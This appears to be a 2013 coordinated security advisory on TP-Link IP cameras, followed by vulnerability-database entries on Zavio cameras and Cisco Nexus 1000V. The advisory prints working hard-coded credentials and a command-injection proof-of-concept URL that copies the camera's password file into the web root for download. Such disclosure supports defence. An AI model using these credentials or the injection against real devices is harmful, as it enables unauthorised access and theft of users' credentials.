Advisory ID: CORE-2013-0318
Advisory URL:
http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: TP-Link
Release mode: Coordinated release
2. *Vulnerability Description*
Multiple vulnerabilities have been found in TP-Link IP cameras based on
firmware v1.6.18P12 and below, that could allow an unauthenticated
remote attacker:
1. [CVE-2013-2572] to bypass user web interface authentication using
hard-coded credentials.
2. [CVE-2013-2573] to execute arbitrary OS commands through the 'ap'
parameter of 'wireless_mft.cgi' (Sec. 7.2). This flaw can also be used to
obtain all credentials of registered users.
4. *Vulnerable Packages*
.
Tests and PoC were run on:
. TL-SC 3130 [CVE-2013-2572] works with this device only
. TL-SC 3130G
. TL-SC 3171G
.
5. *Vendor Information, Solutions and Workarounds*
Vendor provides the links to patched firmware versions. This software is
*beta*; TP-Link will release the final versions with release notes and
some new functions and fixes in the following days.
. http://www.tp-link.com/resources/software/TL-SC3430_V1_130527.zip
. http://www.tp-link.com/resources/software/TL-SC3430N_V1_130527.zip
. http://www.tp-link.com/resources/software/TL-SC3130_V1_130527.zip
. http://www.tp-link.com/resources/software/TL-SC3130G_V1_130527.zip
. http://www.tp-link.com/resources/software/TL-SC3171_V1_130527.zip
. http://www.tp-link.com/resources/software/TL-SC3171G_V1_130527.zip
. http://www.tp-link.com/resources/software/TL-SC4171G_V1_130527.zip
6. *Credits*
These vulnerabilities were discovered and researched by Nahuel Riva and
Francisco Falcon from Core Exploit Writers Team. The publication of this
advisory was coordinated by Fernando Miranda from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *Hard-Coded Credentials in Administrative Web Interface*
[CVE-2013-2572] TP-Link IP cameras use the Boa web server [1], a popular
tiny server for embedded Linux devices. 'boa.conf' is the Boa
configuration file, and the following account can be found inside:
/-----
# MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam
-----/
This account is not visible from the user web interface; users are not
aware of its existence and cannot remove it. Through this account it
is possible to access two CGI files located in '/cgi-bin/mft/':
1. 'manufacture.cgi'
2. 'wireless_mft.cgi'
7.2. *OS Command Injection in wireless_mft.cgi*
[CVE-2013-2573] The file '/cgi-bin/mft/wireless_mft.cgi' has an OS
command injection in the parameter 'ap' that can be exploited using the
hard-coded credentials shown in the previous section:
/-----
username: manufacture
password: erutcafunam
-----/
The following proof of concept copies the file where the user
credentials are stored in the web server root directory:
/-----
http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales
-----/
Afterwards, the user credentials can be obtained by requesting:
/-----
http://192.168.1.100/credenciales
-----/
8. *Report Timeline*
. 2013-04-29:
Core Security Technologies notifies the TP-Link Customer Support of the
vulnerabilities. Publication date is set for May 28th, 2013.
. 2013-04-30:
TP-Link team asks for a report with technical information.
. 2013-05-02:
Technical details sent to TP-Link.
. 2013-05-12:
Vendor notifies that a new firmware will be released around May 20th.
. 2013-05-16:
Core asks vendor if they are ready for coordinated public disclosure on
May 20th.
. 2013-05-17:
Vendor notifies that they have fixed the firmware but the testing
process won't be ready before May 24th.
. 2013-05-20:
Core notifies that the advisory publication was re-scheduled for Monday
27th.
. 2013-05-23:
Vendor sends a copy of the beta firmware in order to confirm if issues
were fixed.
. 2013-05-27:
Vendor notifies that consumers are able to download the Beta firmware
from TP-Link website. The final release will be made public in the
following days, and will include some new functions.
. 2013-05-28:
Advisory CORE-2013-0318 published.
9. *References*
[1] http://www.boa.org/.
| VAR-202001-0850 | CVE-2013-2568 |
Zavio IP cameras OS command injection vulnerability
Related entries in the VARIoT exploits database: VAR-E-201305-0003 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
A Command Injection vulnerability exists in Zavio IP Cameras through 1.6.3 via the ap parameter to /cgi-bin/mft/wireless_mft.cgi, which could let a remote malicious user execute arbitrary code. Zavio IP cameras have an OS command injection vulnerability. Information may be obtained or tampered with, or a denial of service (DoS) condition may result. Zavio is an IP camera. This vulnerability can also be used to obtain credentials for all registered users. Zavio IP Cameras are prone to a remote arbitrary command-injection vulnerability.
Successful exploits will allow attackers to execute arbitrary commands in the context of the affected application. This may further aid in other attacks.
Zavio IP Cameras running firmware version 1.6.03 and below are vulnerable.
| VAR-201305-0149 | CVE-2013-1209 | Cisco NX-OS on Cisco Nexus 1000V vulnerable to packet-level encryption and integrity protection being disabled |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The encryption functionality in the Virtual Supervisor Module (VSM) to Virtual Ethernet Module (VEM) communication component in Cisco NX-OS on the Nexus 1000V does not properly authenticate VSM/VEM packets, which allows remote attackers to disable packet-level encryption and integrity protection via crafted packets, aka Bug ID CSCud14710. Cisco Nexus Series switches are data center switches running the Cisco NX-OS operating system.
An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions on the affected device. This may aid in further attacks.
This issue is tracked by Cisco Bug ID CSCud14710. The vulnerability is caused by the program not properly validating VSM/VEM packets.